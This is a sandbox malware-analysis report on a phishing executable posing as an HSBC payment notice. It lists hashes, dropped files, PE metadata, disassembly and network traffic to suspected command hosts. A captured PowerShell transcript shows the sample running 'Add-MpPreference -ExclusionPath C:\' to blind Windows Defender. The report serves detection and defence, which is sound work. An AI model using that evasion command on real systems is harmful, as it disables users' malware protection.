                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 91.8% (good quality ratio 62.6%)
                  • Quality average: 41.9%
                  • Quality standard deviation: 35.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240s for sample files taking high CPU consumption
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:50:53API Interceptor28x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  spuredge.comHSBC Customer Information.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  HSBC Customer Information.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  SecuriteInfo.com.W32.AIDetect.malware2.27504.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  BENEFICIARY PAYMENT NOTICE.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  Invoice-NBM01557.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  HSBC Customer Information.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  HSBC Payment Advice.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  Invoice-NBM01557.exeGet hashmaliciousBrowse
                  • 164.90.131.131

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  FHLB-OFUShusAc5LfPPGet hashmaliciousBrowse
                  • 38.103.146.9
                  mipsGet hashmaliciousBrowse
                  • 38.103.254.188

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  37f463bf4616ecd445d4a1937da06e19duLT5gkRjy.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  duLT5gkRjy.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  EaCmG75WxF.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  fpvN6iDp5r.msiGet hashmaliciousBrowse
                  • 38.103.244.107
                  EaCmG75WxF.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  Se adjunta el pedido, proforma.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  Statement.htmlGet hashmaliciousBrowse
                  • 38.103.244.107
                  Michal November 23, 2021.htmlGet hashmaliciousBrowse
                  • 38.103.244.107
                  survey-1384723731.xlsGet hashmaliciousBrowse
                  • 38.103.244.107
                  Wfedtqxbgeorkwcgiehsnsjbdjghrpjtlr.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  survey-1378794827.xlsGet hashmaliciousBrowse
                  • 38.103.244.107
                  Zr26f1rL6r.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  mN2NobuuDv.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  cs.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  ORDINE + DDT A.M.F SpA.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  mal1.htmlGet hashmaliciousBrowse
                  • 38.103.244.107
                  5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  DOC5629.htmGet hashmaliciousBrowse
                  • 38.103.244.107
                  Racun je u prilogu.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  exe.exeGet hashmaliciousBrowse
                  • 38.103.244.107

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\images.exe
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):111776
                  Entropy (8bit):5.9797505021512665
                  Encrypted:false
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  MD5:A069E61B357F625A7B3595150412C42D
                  SHA1:5FA560D04B13DB7E0216BDA2CA5F1C3B94A8912E
                  SHA-256:0FB47A47BC025991B3ED8895AA84030DEF6E5CC538A9CEC279A73F4528D549C6
                  SHA-512:BF5C8D398A219E35048AA096C5C8F6A699EDC8FFB63570AA8678F593DA324421DFA19154A725E84F84AF266320C90A88852328EF666826A750BDC992F4DFF66F
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 56%, Browse
                  • Antivirus: Metadefender, Detection: 20%, Browse
                  • Antivirus: ReversingLabs, Detection: 49%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@.........................................................................t...(.......N................................................................... ... ....................................text....t.......................... ..`.data...4...........................@....rsrc...N...........................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\ProgramData\images.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22268
                  Entropy (8bit):5.605280175734106
                  Encrypted:false
                  SSDEEP:384:FtCDqElDmQsq+sYhRYSBKnYjultI2j7Y9gtSJ3x+T1MarZlbAV7W3WDmZBDI+iuC:2s744KYCltZXtc0CSfw6RVW
                  MD5:76A8F16698B242D790634A3A452C6E2B
                  SHA1:99053AB5F93F1FE29FE01A5EA48FE23687FA2DF5
                  SHA-256:FC9861C453F85E3130FE483937FB57C36A30B3508397813C6E81C5F3516307AA
                  SHA-512:B501F13DA22E864C6C6FA463D430ED3520C03167E7DA6468313F5CDDD8BEC09522E5754177E8C1B55CCFB24B64B6B292B102532B0A06FA89D43C45E34EECEE14
                  Malicious:false
                  Reputation:low
                  Preview: @...e...........v.......h...W.P.M.....:...I..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tubbusjo.0kz.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\Documents\20211125\PowerShell_transcript.051829.7+5fXBbe.20211125185051.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5072
                  Entropy (8bit):5.382415440050556
                  Encrypted:false
                  SSDEEP:96:BZ646EeN5qqDo1ZwwZ66EeN5qqDo1ZBM6UjZ66EeN5qqDo1ZKFEE8Z3:1KbKOKE
                  MD5:6BFB8157D1151FE07FEA9D44ECA37EDF
                  SHA1:2476FF605738DCEEE7AFBD7F2F59C942AB4D9183
                  SHA-256:E8683A6B7380D857B8F1912F18323981E8A851197DE7F46E8834F53AB5657757
                  SHA-512:6970864B49468B4C1496D6BFE17941AD3A6A3F945C467BF45EBDE56D58D7166E7746E87A08516830F9884DE01C8289AF97ED4FFA1543860386596FDB444969BB
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125185053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125185053..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20211125185436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPr

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.9797505021512665
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:HSBC Payment Advice.exe
                  File size:111776
                  MD5:a069e61b357f625a7b3595150412c42d
                  SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
                  SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
                  SHA512:bf5c8d398a219e35048aa096c5c8f6a699edc8ffb63570aa8678f593da324421dfa19154a725e84f84af266320c90a88852328ef666826a750bdc992f4dff66f
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@........................

                  File Icon

                  Icon Hash:20047c7c70f0e004

                  Static PE Info

                  General

                  Entrypoint:0x4011a8
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x4BDCF126 [Sun May 2 03:27:34 2010 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:15f2ba1f2bb76fff74223ec60bc62d7d

                  Authenticode Signature

                  Signature Valid:false
                  Signature Issuer:E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                  Error Number:-2146762487
                  Not Before, Not After
                  • 11/24/2021 11:04:33 AM 11/24/2022 11:04:33 AM
                  Subject Chain
                  • E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Version:3
                  Thumbprint MD5:99DF32578053FC972FD1F244233579CA
                  Thumbprint SHA-1:11E3E91B7D7A2135B9E864D5EFEBD574FA821A18
                  Thumbprint SHA-256:2BED8134662C05F42BA8B6FE9C0873AA65E6A2AB13FFFFB2377591D7C09D20FE
                  Serial:00

                  Entrypoint Preview

                  Instruction
                  push 00401994h
                  call 00007F2B9497B253h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  inc eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [3980A88Fh], dh
                  add byte ptr [ebp-0C4A53BCh], dh
                  mov dword ptr [edi-48h], ecx
                  mov word ptr [edx+00000000h], fs
                  add byte ptr [eax], al
                  add dword ptr [eax], eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  rcl ch, FFFFFFEEh
                  add al, byte ptr [esi+6Fh]
                  jc 00007F2B9497B2CFh
                  pop edi
                  inc esp
                  imul ebp, dword ptr [ebx+6Bh], 726F7265h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  dec esp
                  xor dword ptr [eax], eax
                  push es
                  stc
                  jnle 00007F2B9497B20Bh
                  in al, dx
                  sti
                  mov dl, 49h
                  dec ebx
                  mov esp, 17291D76h
                  sub eax, 7DD6CE7Ah
                  jle 00007F2B9497B257h
                  pop esp
                  mov dl, 2Ah
                  inc edx
                  mov edi, D0385669h
                  loop 00007F2B9497B259h
                  cmp cl, byte ptr [bx-53h]
                  xor ebx, dword ptr [ecx-48EE309Ah]
                  or al, 00h
                  stosb
                  add byte ptr [eax-2Dh], ah
                  xchg eax, ebx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor al, byte ptr [ecx]
                  add byte ptr [eax], al
                  dec esi
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  or al, byte ptr [eax]
                  inc esi
                  outsd
                  jc 00007F2B9497B2CFh
                  pop edi
                  push eax
                  dec eax
                  pop ecx
                  dec esp
                  dec esp
                  add byte ptr [46000C01h], cl
                  outsd
                  jc 00007F2B9497B2CFh

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x183740x28.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000xa4e.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1a0000x14a0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2200x20
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000xa8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x174d40x18000False0.475453694661data6.08617646952IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data0x190000x1c340x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x1b0000xa4e0x1000False0.195068359375data2.1656784604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  VAV0x1b9100x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                  RT_ICON0x1b7e00x130data
                  RT_ICON0x1b4f80x2e8data
                  RT_ICON0x1b3d00x128GLS_BINARY_LSB_FIRST
                  RT_GROUP_ICON0x1b3a00x30data
                  RT_VERSION0x1b1a00x200dataChineseTaiwan

                  Imports

                  DLLImport
                  MSVBVM60.DLLMethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

                  Version Infos

                  DescriptionData
                  Translation0x0404 0x04b0
                  ProductVersion1.00
                  InternalNameForm_HALVGUDB
                  FileVersion1.00
                  OriginalFilenameForm_HALVGUDB.exe
                  ProductNameForm_Dikkeror6

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  ChineseTaiwan

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  11/25/21-18:53:02.752720UDP254DNS SPOOF query response with TTL of 1 min. and no authority53609838.8.8.8192.168.2.7

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 25, 2021 18:50:48.346342087 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.346391916 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.346503019 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.368999004 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.369026899 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.591464996 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.591680050 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.911839962 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.911871910 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.912266016 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.912343025 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.927681923 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.968868971 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034470081 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034513950 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034595013 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.034611940 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034662008 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.034742117 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.140517950 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.140626907 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.140726089 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.140752077 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.140801907 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.140887022 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.246818066 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.246903896 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247037888 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247054100 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247077942 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247140884 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247150898 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247180939 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247287035 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247297049 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247386932 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247488022 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247560978 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247606039 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247617960 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247683048 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247750044 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247849941 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353219032 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353311062 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353380919 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353388071 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353406906 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353437901 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353461027 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353508949 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353514910 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353533983 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353563070 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353602886 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.354094982 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.354118109 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.460516930 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.460582018 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.460683107 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.464102030 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.464138985 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.681277990 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.681387901 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.689795017 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.689815044 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.690073013 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.690130949 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.691816092 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.732903004 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.893867016 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.893901110 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.894057035 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.894085884 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.894145966 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.000435114 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.000508070 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.000624895 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.000644922 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.000710964 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.000756025 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107126951 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107188940 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107249975 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107270002 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107323885 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107702971 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107767105 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107800961 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107810020 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107836962 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107846022 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107904911 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107969999 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.108017921 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.108079910 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.148771048 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.148972988 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.213685036 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213769913 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213834047 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213830948 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.213857889 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213882923 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213907003 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.213953018 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.213958979 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213969946 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.214006901 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.214238882 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.214256048 CET4434982338.103.244.107192.168.2.7

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 25, 2021 18:50:48.214104891 CET5281653192.168.2.78.8.8.8
                  Nov 25, 2021 18:50:48.326981068 CET53528168.8.8.8192.168.2.7
